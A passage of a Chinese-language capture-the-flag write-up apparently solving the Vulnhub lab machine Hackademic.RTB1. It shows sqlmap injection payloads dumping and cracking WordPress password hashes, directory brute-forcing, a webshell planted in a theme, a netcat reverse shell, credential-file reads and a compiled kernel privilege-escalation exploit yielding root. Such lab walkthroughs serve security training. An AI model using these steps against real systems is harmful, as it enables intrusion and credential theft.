| ndb_binlog_index                      |
| proc                                  |
| procs_priv                            |
| servers                               |
| slow_log                              |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
+---------------------------------------+
Database: wordpress
[9 tables]
+---------------------------------------+
| wp_categories                         |
| wp_comments                           |
| wp_linkcategories                     |
| wp_links                              |
| wp_options                            |
| wp_post2cat                           |
| wp_postmeta                           |
| wp_posts                              |
| wp_users                              |
+---------------------------------------+
[15:48:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 122 times
[15:48:14] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:48:14 /2024-01-16/
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 -D wordpress -T wp_users --columns
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 -D wordpress -T wp_users --columns
___
__H__
___ ___[(]_____ ___ ___  {1.7.9#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:49:20 /2024-01-16/
[15:49:20] [INFO] resuming back-end DBMS 'mysql'
[15:49:20] [INFO] testing connection to the target URL
[15:49:20] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:49:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[15:49:20] [INFO] fetching columns for table 'wp_users' in database 'wordpress'
[15:49:20] [WARNING] reflective value(s) found and filtering out
[15:49:21] [INFO] retrieved: 'ID'
[15:49:21] [INFO] retrieved: 'bigint(20) unsigned'
[15:49:21] [INFO] retrieved: 'user_login'
[15:49:21] [INFO] retrieved: 'varchar(60)'
[15:49:21] [INFO] retrieved: 'user_pass'
[15:49:21] [INFO] retrieved: 'varchar(64)'
[15:49:21] [INFO] retrieved: 'user_firstname'
[15:49:21] [INFO] retrieved: 'varchar(50)'
[15:49:21] [INFO] retrieved: 'user_lastname'
[15:49:21] [INFO] retrieved: 'varchar(50)'
[15:49:21] [INFO] retrieved: 'user_nickname'
[15:49:21] [INFO] retrieved: 'varchar(50)'
[15:49:21] [INFO] retrieved: 'user_nicename'
[15:49:21] [INFO] retrieved: 'varchar(50)'
[15:49:21] [INFO] retrieved: 'user_icq'
[15:49:21] [INFO] retrieved: 'int(10) unsigned'
[15:49:21] [INFO] retrieved: 'user_email'
[15:49:21] [INFO] retrieved: 'varchar(100)'
[15:49:21] [INFO] retrieved: 'user_url'
[15:49:21] [INFO] retrieved: 'varchar(100)'
[15:49:21] [INFO] retrieved: 'user_ip'
[15:49:21] [INFO] retrieved: 'varchar(15)'
[15:49:21] [INFO] retrieved: 'user_domain'
[15:49:21] [INFO] retrieved: 'varchar(200)'
[15:49:21] [INFO] retrieved: 'user_browser'
[15:49:21] [INFO] retrieved: 'varchar(200)'
[15:49:21] [INFO] retrieved: 'user_registered'
[15:49:21] [INFO] retrieved: 'datetime'
[15:49:21] [INFO] retrieved: 'user_level'
[15:49:22] [INFO] retrieved: 'int(2) unsigned'
[15:49:22] [INFO] retrieved: 'user_aim'
[15:49:22] [INFO] retrieved: 'varchar(50)'
[15:49:22] [INFO] retrieved: 'user_msn'
[15:49:22] [INFO] retrieved: 'varchar(100)'
[15:49:22] [INFO] retrieved: 'user_yim'
[15:49:22] [INFO] retrieved: 'varchar(50)'
[15:49:22] [INFO] retrieved: 'user_idmode'
[15:49:22] [INFO] retrieved: 'varchar(20)'
[15:49:22] [INFO] retrieved: 'user_activation_key'
[15:49:22] [INFO] retrieved: 'varchar(60)'
[15:49:22] [INFO] retrieved: 'user_status'
[15:49:22] [INFO] retrieved: 'int(11)'
[15:49:22] [INFO] retrieved: 'user_description'
[15:49:22] [INFO] retrieved: 'longtext'
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_aim            | varchar(50)         |
| user_browser        | varchar(200)        |
| user_description    | longtext            |
| user_domain         | varchar(200)        |
| user_email          | varchar(100)        |
| user_firstname      | varchar(50)         |
| user_icq            | int(10) unsigned    |
| user_idmode         | varchar(20)         |
| user_ip             | varchar(15)         |
| user_lastname       | varchar(50)         |
| user_level          | int(2) unsigned     |
| user_login          | varchar(60)         |
| user_msn            | varchar(100)        |
| user_nicename       | varchar(50)         |
| user_nickname       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
| user_yim            | varchar(50)         |
+---------------------+---------------------+
[15:49:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 46 times
[15:49:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:49:22 /2024-01-16/
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 -D wordpress -T wp_users -C "user_firstname,user_lastname,user_pass" --dump
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 -D wordpress -T wp_users -C user_firstname,user_lastname,user_pass --dump
___
__H__
___ ___[(]_____ ___ ___  {1.7.9#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:57:40 /2024-01-16/
[15:57:40] [INFO] resuming back-end DBMS 'mysql'
[15:57:40] [INFO] testing connection to the target URL
[15:57:40] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
[15:57:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[15:57:40] [INFO] fetching entries of column(s) 'user_firstname,user_lastname,user_pass' for table 'wp_users' in database 'wordpress'
[15:57:40] [WARNING] reflective value(s) found and filtering out
[15:57:40] [INFO] retrieved: 'Nick'
[15:57:41] [INFO] retrieved: '21232f297a57a5a743894a0e4a801fc3'
[15:57:41] [INFO] retrieved: 'Max'
[15:57:41] [INFO] retrieved: '50484c19f1afdaf3841a0d821ed393d2'
[15:57:41] [INFO] retrieved: 'George'
[15:57:41] [INFO] retrieved: 'Miller'
[15:57:41] [INFO] retrieved: '7cbb3252ba6b7e9c422fac5334d22054'
[15:57:41] [INFO] retrieved: 'Jason'
[15:57:41] [INFO] retrieved: 'Konnors'
[15:57:41] [INFO] retrieved: '8601f6e1028a8e8a966f6c33fcd9aec4'
[15:57:41] [INFO] retrieved: 'Tony'
[15:57:41] [INFO] retrieved: 'Black'
[15:57:41] [INFO] retrieved: 'a6e514f9486b83cb53d8d932f9a04292'
[15:57:41] [INFO] retrieved: 'John'
[15:57:41] [INFO] retrieved: 'Smith'
[15:57:41] [INFO] retrieved: 'b986448f0bb9e5e124ca91d3d650f52c'
[15:57:41] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[15:57:49] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'D:\Global\apps\sqlmap\1.7.9\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[15:57:52] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[15:57:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:57:53] [INFO] starting 2 processes
[15:57:5915:57:59] [INFO] [] cracked password 'INFOnapoleon] current status: SIEMP... \' for hash 'a6e514f9486b83cb53d8d932f9a04292'
[15:58:0015:58:00] [] [INFOINFO] current status: abrog... \] cracked password 'q1w2e3' for hash '7cbb3252ba6b7e9c422fac5334d22054'
[15:58:00] [INFO] cracked password 'admin' for hash '21232f297a57a5a743894a0e4a801fc3'
[15:58:26] [INFO] cracked password 'kernel' for hash '50484c19f1afdaf3841a0d821ed393d2'
[15:58:32] [INFO] cracked password 'maxwell' for hash '8601f6e1028a8e8a966f6c33fcd9aec4'
Database: wordpress
Table: wp_users
[6 entries]
+----------------+---------------+---------------------------------------------+
| user_firstname | user_lastname | user_pass                                   |
+----------------+---------------+---------------------------------------------+
| Nick           | James         | 21232f297a57a5a743894a0e4a801fc3 (admin)    |
| Max            | Bucky         | 50484c19f1afdaf3841a0d821ed393d2 (kernel)   |
| George         | Miller        | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)   |
| Jason          | Konnors       | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell)  |
| Tony           | Black         | a6e514f9486b83cb53d8d932f9a04292 (napoleon) |
| John           | Smith         | b986448f0bb9e5e124ca91d3d650f52c            |
+----------------+---------------+---------------------------------------------+
[15:58:58] [INFO] table 'wordpress.wp_users' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135\dump\wordpress\wp_users.csv'
[15:58:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 20 times
[15:58:58] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:58:58 /2024-01-16/

破解出五个账号密码

目录爆破

看到数据库里有wordpress的表,尝试爆破下路径

gobuster dir -u http://192.168.65.135 --wordlist=D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.65.135
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2024/01/16 16:02:04 Starting gobuster in directory enumeration mode
===============================================================
/phpmyadmin           (Status: 403) [Size: 292]
/phpMyAdmin           (Status: 403) [Size: 292]
Progress: 23536 / 62285 (37.79%)[ERROR] 2024/01/16 16:02:14 [!] parse "http://192.168.65.135/error\x1f_log": net/url: invalid control character in URL
Progress: 62162 / 62285 (99.80%)
===============================================================
2024/01/16 16:02:37 Finished
===============================================================

没啥结果,换个路径重新试一下

gobuster dir -u http://192.168.65.135/Hackademic_RTB1/ --wordlist=D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.65.135/Hackademic_RTB1/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2024/01/16 16:03:40 Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 337] [--> http://192.168.65.135/Hackademic_RTB1/wp-content/]
/wp-admin             (Status: 301) [Size: 335] [--> http://192.168.65.135/Hackademic_RTB1/wp-admin/]
/wp-includes          (Status: 301) [Size: 338] [--> http://192.168.65.135/Hackademic_RTB1/wp-includes/]
/wp-https://static.2ephyr.icu/blog            (Status: 301) [Size: 336] [--> http://192.168.65.135/Hackademic_RTB1/wp-https://static.2ephyr.icu/blog/]
Progress: 23662 / 62285 (37.99%)[ERROR] 2024/01/16 16:04:01 [!] parse "http://192.168.65.135/Hackademic_RTB1/error\x1f_log": net/url: invalid control character in URL
Progress: 39297 / 62285 (63.09%)[ERROR] 2024/01/16 16:04:16 [!] Get "http://192.168.65.135/Hackademic_RTB1/ouachita": dial tcp 192.168.65.135:80: connectex: Only one usage of each socket address (protocol/network address/port) is normally permitted.
Progress: 62023 / 62285 (99.58%)
===============================================================
2024/01/16 16:04:35 Finished
===============================================================

爆破出后台路径,用前面爆破出的账号和密码尝试登录

尝试登录GeorgeMiller-q1w2e3账号发现有主题编辑权限

直接在Header Template底部写个shell

蚁剑连接再弹个shell

nc -lvvp 4444
listening on [any] 4444 ...
192.168.65.135: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.65.128] from (UNKNOWN) [192.168.65.135] 48355: NO_DATA
bash: no job control in this shell
bash-4.0$

主机信息搜集

bash-4.0$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash
bash-4.0$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
bash-4.0$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  *  command to be executed
bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
bash-4.0$
bash-4.0$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for apache:
Sorry, try again.

权限提升

searchsploit Linux Kernel 2.6.3
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation             | solaris/local/15962.c
Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation                        | linux/local/4756.c
Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure                           | linux/local/9363.c
Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service         | linux/dos/1880.c
Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3)       | linux/local/9575.c
Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2)        | linux/local/9574.txt
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak                        | linux/local/4172.c
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation             | linux/local/6851.c
Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure                               | linux/local/7618.c
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation                  | linux/local/33523.c
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation                    | linux/local/8369.sh
Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service                         | linux/dos/9442.c
Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service                      | linux/dos/10202.c
Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)                    | linux/local/9543.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation | linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escala | linux/local/15944.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation  | linux/local/17787.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalat | linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalatio | linux_x86-64/local/15023.c
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosur | linux/local/15150.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation           | linux/local/15774.c
Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)         | linux/dos/16952.c
Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership | linux/local/718.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation                     | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation          | linux_x86-64/local/44302.c
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalati | linux_x86-64/local/34134.c
Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation             | arm/local/31574.c
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privileg | linux_x86-64/local/44299.c
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)    | linux_x86-64/local/26131.c
Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escal | linux/local/25450.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service          | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation                          | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation     | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)                               | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation         | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service                                     | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak                              | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption                  | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free                                        | linux/dos/44579.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local | linux/local/47169.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privileg | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalatio | linux/local/43418.c
Linux Kernel < 4.5.1 - Off-By-One (PoC)                                               | linux/dos/44301.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalatio | linux/local/9844.py
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalat | linux/local/19933.rb
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'i | linux_x86/local/9542.c
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)                 | linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation                  | linux/local/40812.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation    | linux_x86-64/local/15024.c
Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service                             | linux/dos/274.c
Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)                  | linux/local/9521.c
Linux Kernel 2.6.30 - 'tun_chr_pool()' Null Pointer Dereference                       | linux/dos/33088.txt
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation        | linux/local/9191.txt
Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow                     | linux/dos/33228.txt
Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service               | linux/dos/10022.c
Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure                         | linux/local/9352.c
Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure                | linux/local/9513.c
Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)                         | linux/local/10018.sh
Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation       | linux/local/41770.txt
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure | linux/local/24459.sh
Linux Kernel 2.6.32-642/3.16.0-4 - 'inode' Integer Overflow                           | linux/dos/40819.c
Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak                                      | linux_x86-64/local/40811.c
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service                            | linux/dos/14594.py
Linux Kernel 2.6.34 - 'find_keyring_by_name()' Local Memory Corruption                | linux/dos/33886.txt
Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service                      | linux/dos/36425.txt
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite                   | linux/local/15344.c
Linux Kernel 2.6.36 IGMP - Remote Denial of Service                                   | linux/dos/18378.c
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation                   | linux/local/15285.c
Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)                              | linux/dos/16263.c
Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service                           | linux/dos/15619.c
Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service                            | linux/dos/15622.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalat | linux/local/15704.c
Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak            | linux/local/18080.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege | linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)  | linux/local/35161.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege E | linux_x86-64/local/33516.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                  | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                            | linux/local/41886.c
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution                             | multiple/remote/38454.py
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege E | linux/local/12130.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

尝试15285.c可以成功提权

Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation                   | linux/local/15285.c

蚁剑上传,GCC编译执行,提权成功

sh-4.0$ cd /tmp
cd /tmp
sh-4.0$ ls
ls
15285.c  crontab.XXXXsskXAR  orbit-gdm  pulse-PKdhtXMmr18n
sh-4.0$ gcc -o exp 15285.c
gcc -o exp 15285.c
sh-4.0$ chmod +x exp
chmod +x exp
sh-4.0$ ./exp
./exp
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
sh-4.0# ls
ls
15285.c  crontab.XXXXsskXAR  exp  orbit-gdm  pulse-PKdhtXMmr18n
sh-4.0# whoami
whoami
root
sh-4.0#

flag

sh-4.0# cd /root
cd /root
sh-4.0# ls
ls
Desktop  anaconda-ks.cfg  key.txt  key.txt~
sh-4.0# cat key.txt
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
$_d&jgQ>>ak\#b"(Hx"o<la_%
Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com
sh-4.0# cat key.txt~
cat key.txt~
Yeah!!
You must be proud becouse you ve got the password to complete the First Reallistic Hackademic Challenge (Hackademic.RTB1) :)
$_d&jgQ>>ak\#b"(Hx"o<la_%
Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com
sh-4.0#
SQLInjectVulnhubWeb
暂无评论

发送评论 编辑评论 



























































































|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	




颜文字
Emoji
